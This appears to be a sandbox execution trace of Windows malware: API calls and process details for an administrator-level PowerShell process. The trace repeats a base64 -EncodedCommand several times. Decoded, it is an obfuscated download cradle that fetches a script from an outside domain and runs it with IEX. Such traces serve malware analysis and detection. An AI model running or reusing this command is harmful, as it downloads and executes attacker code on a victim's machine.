	[0330.569] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c9ce3e0 | out: pNumArgs=0x1c9ce3e0) returned 0x1b89add0*=""
	[0330.570] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.571] CoTaskMemAlloc (cb=0x22) returned 0x1b8bae10
	[0330.571] RtlMoveMemory (in: Destination=0x1b8bae10, Source=0x1b89adf2, Length=0x20 | out: Destination=0x1b8bae10) 
	[0330.571] CoTaskMemFree (pv=0x1b8bae10) 
	[0330.571] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.571] CoTaskMemAlloc (cb=0x2f4) returned 0x1b8ad760
	[0330.571] RtlMoveMemory (in: Destination=0x1b8ad760, Source=0x1b89ae12, Length=0x2f2 | out: Destination=0x1b8ad760) 
	[0330.571] CoTaskMemFree (pv=0x1b8ad760) 
	[0330.572] LocalFree (hMem=0x1b89add0) returned 0x0
	[0331.153] CoTaskMemAlloc (cb=0x804) returned 0x1b8c5980
	[0331.153] GetConsoleTitleW (in: lpConsoleTitle=0x1b8c5980, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0331.154] CoTaskMemFree (pv=0x1b8c5980) 
	[0331.782] CoTaskMemAlloc (cb=0x38e) returned 0x1b8ad760
	[0331.782] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c9ce340*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30c4f38 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x30c4f38*(hProcess=0x368, hThread=0x364, dwProcessId=0xf54, dwThreadId=0xf58)) returned 1
	[0331.786] CoTaskMemFree (pv=0x1b8ad760) 
	[0331.787] CloseHandle (hObject=0x364) returned 1
	[0331.787] CoTaskMemAlloc (cb=0x3b) returned 0x1b8c0540
	[0331.787] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c9ce3e8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9ce3e8) returned 0x4550
	[0331.788] CoTaskMemFree (pv=0x1b8c0540) 
	[0331.791] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.791] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.791] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x368, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c9ce4c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c9ce4c8*=0x364) returned 1

Process:
	id = "6"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3431b000"
	os_pid = "0x588"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 33
	os_tid = 0x83c

	[0241.170] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0242.454] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.454] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.454] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0242.454] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0245.530] GetVersionExW (in: lpVersionInformation=0xcdf20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdf20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.531] GetVersionExW (in: lpVersionInformation=0xcdf20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdf20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.542] GetVersionExW (in: lpVersionInformation=0xcdc90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdc90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.543] SetErrorMode (uMode=0x1) returned 0x1
	[0245.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcddf0 | out: lpFileInformation=0xcddf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0245.544] SetErrorMode (uMode=0x1) returned 0x1
	[0245.547] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xce060 | out: lpdwHandle=0xce060) returned 0x94c
	[0245.549] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bb72d8 | out: lpData=0x2bb72d8) returned 1
	[0245.986] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdfd8, puLen=0xcdfd0 | out: lplpBuffer=0xcdfd8*=0x2bb7374, puLen=0xcdfd0) returned 1
	[0245.988] lstrlenW (lpString="䅁") returned 1
	[0245.995] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x2bb7450, puLen=0xcdf40) returned 1
	[0245.996] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0245.997] CoTaskMemAlloc (cb=0x2e) returned 0x1c9380
	[0245.997] lstrcpyW (in: lpString1=0x1c9380, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0245.998] CoTaskMemFree (pv=0x1c9380) 
	[0245.998] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x2bb74a4, puLen=0xcdf40) returned 1
	[0245.998] lstrlenW (lpString="System.Management.Automation") returned 28
	[0245.998] CoTaskMemAlloc (cb=0x3c) returned 0x148ee0
	[0245.998] lstrcpyW (in: lpString1=0x148ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0245.998] CoTaskMemFree (pv=0x148ee0) 
	[0245.998] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x2bb7500, puLen=0xcdf40) returned 1
	[0245.998] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0245.998] CoTaskMemAlloc (cb=0x20) returned 0x1c7530
	[0245.998] lstrcpyW (in: lpString1=0x1c7530, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0245.998] CoTaskMemFree (pv=0x1c7530) 
	[0245.998] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x2bb7540, puLen=0xcdf40) returned 1
	[0245.998] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0245.998] CoTaskMemAlloc (cb=0x44) returned 0x148ee0
	[0245.999] lstrcpyW (in: lpString1=0x148ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0245.999] CoTaskMemFree (pv=0x148ee0) 
	[0245.999] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x2bb75a8, puLen=0xcdf40) returned 1
	[0245.999] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0245.999] CoTaskMemAlloc (cb=0x76) returned 0x174190
	[0245.999] lstrcpyW (in: lpString1=0x174190, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0245.999] CoTaskMemFree (pv=0x174190) 
	[0245.999] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x2bb7644, puLen=0xcdf40) returned 1
	[0245.999] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0245.999] CoTaskMemAlloc (cb=0x44) returned 0x148ee0
	[0245.999] lstrcpyW (in: lpString1=0x148ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0245.999] CoTaskMemFree (pv=0x148ee0) 
	[0245.999] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x2bb76a8, puLen=0xcdf40) returned 1
	[0245.999] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0245.999] CoTaskMemAlloc (cb=0x58) returned 0x197160
	[0245.999] lstrcpyW (in: lpString1=0x197160, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0245.999] CoTaskMemFree (pv=0x197160) 
	[0245.999] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x2bb7724, puLen=0xcdf40) returned 1
	[0245.999] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0245.999] CoTaskMemAlloc (cb=0x20) returned 0x1c7530
	[0245.999] lstrcpyW (in: lpString1=0x1c7530, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0245.999] CoTaskMemFree (pv=0x1c7530) 
	[0245.999] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x2bb73cc, puLen=0xcdf40) returned 1
	[0245.999] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0245.999] CoTaskMemAlloc (cb=0x66) returned 0x1c5dc0
	[0245.999] lstrcpyW (in: lpString1=0x1c5dc0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0245.999] CoTaskMemFree (pv=0x1c5dc0) 
	[0245.999] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x0, puLen=0xcdf40) returned 0
	[0245.999] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x0, puLen=0xcdf40) returned 0
	[0245.999] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdf48, puLen=0xcdf40 | out: lplpBuffer=0xcdf48*=0x0, puLen=0xcdf40) returned 0
	[0245.999] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdf18, puLen=0xcdf10 | out: lplpBuffer=0xcdf18*=0x2bb7374, puLen=0xcdf10) returned 1
	[0246.000] CoTaskMemAlloc (cb=0x204) returned 0x1768e0
	[0246.000] VerLanguageNameW (in: wLang=0x0, szLang=0x1768e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0246.001] CoTaskMemFree (pv=0x1768e0) 
	[0246.001] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2bb7300, puLen=0xcdf60) returned 1
	[0246.006] GetCurrentProcessId () returned 0x588
	[0246.018] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcce90 | out: lpLuid=0xcce90*(LowPart=0x14, HighPart=0)) returned 1
	[0246.454] GetCurrentProcess () returned 0xffffffffffffffff
	[0246.454] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xcceb0 | out: TokenHandle=0xcceb0*=0x2ec) returned 1
	[0246.455] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2bbab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0246.456] CloseHandle (hObject=0x2ec) returned 1
	[0246.459] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x2ec
	[0246.466] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2bbabb8, cb=0x200, lpcbNeeded=0xcdec8 | out: lphModule=0x2bbabb8, lpcbNeeded=0xcdec8) returned 1
	[0246.468] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2bbae28, cb=0x18 | out: lpmodinfo=0x2bbae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0246.469] CoTaskMemAlloc (cb=0x804) returned 0x1d0400
	[0246.469] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x1d0400, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0246.469] CoTaskMemFree (pv=0x1d0400) 
	[0246.470] CoTaskMemAlloc (cb=0x804) returned 0x1d0400
	[0246.470] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x1d0400, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0246.470] CoTaskMemFree (pv=0x1d0400) 
	[0246.471] CloseHandle (hObject=0x2ec) returned 1
	[0246.477] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x588) returned 0x2ec
	[0246.478] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0xcdff8 | out: lpExitCode=0xcdff8*=0x103) returned 1
	[0246.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bbb088, Length=0x20000, ResultLength=0xcdfc0 | out: SystemInformation=0x12bbb088, ResultLength=0xcdfc0*=0xf4a0) returned 0x0
	[0246.496] EnumWindows (lpEnumFunc=0x27966ac, lParam=0x0) returned 1
	[0246.497] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.497] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x558
	[0246.497] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.497] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.497] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.497] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x538
	[0246.497] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.497] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x778
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x778
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x460
	[0246.498] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0246.897] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0247.475] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x924
	[0247.950] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x8dc
	[0248.244] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x7dc
	[0248.995] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x768
	[0248.995] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x764
	[0248.995] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x820
	[0248.995] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x810
	[0248.995] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x794
	[0248.995] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x83c
	[0248.996] GetWindow (hWnd=0x401b6, uCmd=0x4) returned 0x0
	[0248.997] IsWindowVisible (hWnd=0x401b6) returned 0
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x7ac
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0xb44
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0xb5c
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x838
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0248.997] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x818
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x5b8
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x494
